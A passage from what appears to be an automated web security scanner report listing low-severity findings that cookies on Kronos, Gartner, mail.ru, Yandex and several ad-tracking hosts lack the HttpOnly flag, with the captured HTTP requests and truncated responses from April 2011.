GET /user/forgotusername.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13247
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...

16.73. https://customer.kronos.com/user/logindenied.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/logindenied.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/logindenied.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
Referer: https://customer.kronos.com/Default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16169
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...

16.74. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/bh.gif?n=826&g=20&a=798&s=$t&l=1&t=i&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 88
Content-Type: image/gif
Set-Cookie: ZFFAbh=845B826,20|798_845#365;expires=Tue, 24 Apr 2012 15:14:03 GMT;domain=.zedo.com;path=/;
ETag: "1b633f4-7054-4942082502f40"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 1492157159
Cache-Control: max-age=29594
Expires: Mon, 25 Apr 2011 23:27:18 GMT
Date: Mon, 25 Apr 2011 15:14:04 GMT
Connection: close

GIF89a.............!.......,...........D..;

GIF89a.............!.......,...........D..;

16.75. http://fc.ef.d4.cf.bd.a1.top.mail.ru/counter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fc.ef.d4.cf.bd.a1.top.mail.ru
Path:   /counter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=1963260;js=13;r=;j=true;s=1920*1200;d=16;rand=0.3155316608026624 HTTP/1.1
Host: fc.ef.d4.cf.bd.a1.top.mail.ru
Proxy-Connection: keep-alive
Referer: http://odnoklassniki.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:30:07 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2Tir3I2W_cms; path=/; expires=Tue, 26 Jul 2011 14:30:07 GMT; domain=.mail.ru
Set-Cookie: FTID=0; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:01 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 43
Connection: close

GIF89a.............!.......,...........D..;

16.76. http://goods.adnectar.com/analytics/get_avia_js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://goods.adnectar.com
Path:   /analytics/get_avia_js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /analytics/get_avia_js?api_version=3.0.0&site_key=a9aa425c93ef5dff380c&avia_version=0.8.16 HTTP/1.1
Host: goods.adnectar.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:24 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Status: 200
ETag: "643abe138f06b030650a5c28ca19bdb4"
X-Runtime: 1
Content-Length: 6324
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: adnectar_id=PObkQ021hYBNKXjmCLweAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"

var exceptionmessage = null;
try {
var avia_already_defined = false;
if (typeof(_an_tracker) !== 'undefined') {
avia_already_defined = true;
}

// First, define JS versions of methods not
...[SNIP]...

16.77. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=ab470e57-8d67-4a28-b9b1-aaf3331f5214 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251; domain=.interclick.com; expires=Sun, 25-Apr-2021 14:43:44 GMT; path=/
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 25 Apr 2011 14:43:44 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;

16.78. http://ideco-software.ru/products/ims/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ideco-software.ru
Path:   /products/ims/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/ims/?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013 HTTP/1.1
Host: ideco-software.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 14:35:59 GMT
Server: Microsoft-IIS/6.0
Connection: Close
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: dv=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: Query=/products/ims/index.html?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: FirstVisit=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fkdyl055c3sg0uuma045oy45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=windows-1251
Content-Length: 21815

<html><!-- #BeginTemplate "/Templates/main.dwt" --><!-- DW6 -->
<head>
<script type="text/javascript" src="/dropmenu/jquery.js" />
</script>
<script type="text/javascript" src="/dropmenu/hmenu.js"
...[SNIP]...

16.79. http://imagesrv.gartner.com/cio/css/main.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imagesrv.gartner.com
Path:   /cio/css/main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cio/css/main.css;pv0bc766061b78d383 HTTP/1.1
Host: imagesrv.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/contact/contact_gartner.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733464197:ss=1303732853510; MKTSESSIONID=2pxxN1kBM49w9XHgl67B0BKnWmRD24ZpTvjK6St3Ncw4TQzX7by2!-1018522061

Response

HTTP/1.1 200 OK
Content-type: text/css
Last-modified: Thu, 10 Feb 2011 15:31:18 GMT
ETag: "pv0bc766061b78d383b704fc4b546e71f0"
Expires: Sat, 15 Oct 2011 01:53:05 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A150946.RA0.G24F27.U71F6CC0A].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:15 GMT
Age: 2975
Set-Cookie: TS83f541=0e579c5f976d24a5c926f7f3b7d6a05cfcbcedc8689d66614db564e2; Path=/
Content-Length: 7018

body form#formName3 {width: none;}
body #menubar {width: 0; padding-right: 14px;}
#tribanner { background: url(/images/tertiary_header_bkg.jpg) no-repeat; width: 990px; height:90px; }
#tribanner h
...[SNIP]...

16.80. http://imagesrv.gartner.com/js/utility_tech.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imagesrv.gartner.com
Path:   /js/utility_tech.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/utility_tech.js;pv8fee1c55d3d4ff57 HTTP/1.1
Host: imagesrv.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/contact/contact_gartner.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733464197:ss=1303732853510; MKTSESSIONID=2pxxN1kBM49w9XHgl67B0BKnWmRD24ZpTvjK6St3Ncw4TQzX7by2!-1018522061

Response

HTTP/1.1 200 OK
Content-type: application/x-javascript
Last-modified: Thu, 12 Aug 2010 18:59:21 GMT
ETag: "pv8fee1c55d3d4ff5738b077a5af527bc3"
Expires: Sat, 15 Oct 2011 01:46:10 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A150946.RA0.G24F27.UF576D692].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:15 GMT
Age: 1314
Set-Cookie: TS83f541=9116be29a30d782a8a47de6d68ae74f8d1b126f0043c06c64db564e2; Path=/
Content-Length: 2675

// JavaScript Document
// POPUP FUNCTIONS (NEED FOR OTHER FUNCTIONS TO WORK)
function rawPopUp(url, width, height, features, target) {

// main raw popup
// written by Peter Mahnke 20 May 2
...[SNIP]...

16.81. http://kronos.d1.sc.omtrdc.net/b/ss/kronos-dev/1/H.22.1/s64896461574826  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kronos.d1.sc.omtrdc.net
Path:   /b/ss/kronos-dev/1/H.22.1/s64896461574826

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/kronos-dev/1/H.22.1/s64896461574826?AQB=1&ndh=1&t=25%2F3%2F2011%208%3A33%3A57%201%20300&ns=kronos&pageName=kronos&g=http%3A%2F%2Fwww.kronos.com%2F&cc=USD&ch=kronos&events=event3&c1=kronos&c2=kronos&v2=D%3Dch&v4=D%3Dc1&v5=D%3Dc2&c7=6%3A30AM&v7=D%3Dc7&c8=Monday&v8=D%3Dc8&c9=New&v9=D%3Dc9&c10=1&v10=D%3Dc10&c11=First%20Visit&v11=D%3Dc11&v12=%2B1&v13=D%3DpageName&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1125&bh=981&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: kronos.d1.sc.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 13:33:47 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DABC1D85079987-60000101000062A7[CE]; Expires=Sat, 23 Apr 2016 13:33:47 GMT; Domain=kronos.d1.sc.omtrdc.net; Path=/
Location: http://kronos.d1.sc.omtrdc.net/b/ss/kronos-dev/1/H.22.1/s64896461574826?AQB=1&pccr=true&vidn=26DABC1D85079987-60000101000062A7&&ndh=1&t=25%2F3%2F2011%208%3A33%3A57%201%20300&ns=kronos&pageName=kronos&g=http%3A%2F%2Fwww.kronos.com%2F&cc=USD&ch=kronos&events=event3&c1=kronos&c2=kronos&v2=D%3Dch&v4=D%3Dc1&v5=D%3Dc2&c7=6%3A30AM&v7=D%3Dc7&c8=Monday&v8=D%3Dc8&c9=New&v9=D%3Dc9&c10=1&v10=D%3Dc10&c11=First%20Visit&v11=D%3Dc11&v12=%2B1&v13=D%3DpageName&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1125&bh=981&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 24 Apr 2011 13:33:47 GMT
Last-Modified: Tue, 26 Apr 2011 13:33:47 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www8
Content-Length: 0
Content-Type: text/plain


16.82. http://mail.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.ru
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: mail.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:24:37 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: Mpopl=721425857; expires=Mon, 25 Apr 2011 14:39:37 GMT; path=/; domain=.mail.ru
Set-Cookie: mrcu=D5824DB584250497422EF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:37 GMT; path=/; domain=.mail.ru
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Sun, 25 Apr 2010 14:24:37 GMT
Last-Modified: Mon, 25 Apr 2011 18:24:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 114440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head
...[SNIP]...

16.83. http://map.media6degrees.com/orbserv/aopix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/aopix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/aopix?pixId=6387&pcv=56&cb=2534812616&topHref=http%3A%2F%2Fwww.livejournal.com%2F HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2ljtllp0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=012020h1ljtllpxzt1tzu; clid=2ljtllp01170xrd52zkwjuxh0cf4p00736010i01407; rdrlst=40315xylk60qe0000000136010znmlk346200000002360110poljyxb4000000043601; sglst=2020s0t7ljyxb4073fa00436010i01404ag3ljyxb4073fa00436010i01404; vstcnt=417k010r014uzg6118e1002

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh0e4d100837010i02408; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Set-Cookie: rdrlst=40415xylk60qe00000002370113bolk7pyq0000000137010znmlk346200000003370110poljyxb4000000053701; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Set-Cookie: sglst=2020s0t7ljyxb408snm00537010i02405ag3ljyxb408snm00537010i02405; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Set-Cookie: vstcnt=417k010r014uzg6118e1002; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Location: http://ad.afy11.net/ad?mode=7&publisher_dsp_id=5&external_user_id=xrd52zkwjuxh&custom_mon=0
Content-Length: 0
Date: Mon, 25 Apr 2011 14:37:38 GMT


16.84. http://mc.yandex.ru/watch/57617  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mc.yandex.ru
Path:   /watch/57617

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /watch/57617?rn=540876&cnt-class=1&page-ref=&page-url=http%3A%2F%2Fwebalta.ru%2F&browser-info=j:1:s:1920x1200x16:f:10.2.154:w:1125x981:z:-300:i:20110425092015:l:4.0.60129.0:en:utf-8:v:911:c:1:t:%D0%9F%D0%BE%D0%B8%D1%81%D0%BA%D0%BE%D0%B2%D0%B0%D1%8F%20%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0%20Webalta&site-info=%7B%7D&wmode=3 HTTP/1.1
Host: mc.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:20:05 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:05 GMT
Expires: Mon, 25 Apr 2011 14:20:05 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://mc.yandex.ru/watch/57617/1?rn=540876&cnt-class=1&page-ref=&page-url=http%3A%2F%2Fwebalta.ru%2F&browser-info=j:1:s:1920x1200x16:f:10.2.154:w:1125x981:z:-300:i:20110425092015:l:4.0.60129.0:en:utf-8:v:911:c:1:t:%D0%9F%D0%BE%D0%B8%D1%81%D0%BA%D0%BE%D0%B2%D0%B0%D1%8F%20%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0%20Webalta&site-info=%7B%7D&wmode=3
Set-Cookie: yandexuid=1458985311303741205; domain=.yandex.ru; path=/; expires=Thu, 22-Apr-2021 14:20:05 GMT
Set-Cookie: yabs-sid=377248491303741205; path=/
Content-Length: 0


16.85. http://pda.loveplanet.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pda.loveplanet.ru
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: pda.loveplanet.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: affiliate_reff=http%3A%2F%2Fmy.webalta.ru%2F; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: randomhit=1698142961; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:51:44 GMT
Content-Length: 11125

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title>.................... LovePlanet.ru. .......... .............. .. .........
...[SNIP]...

16.86. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
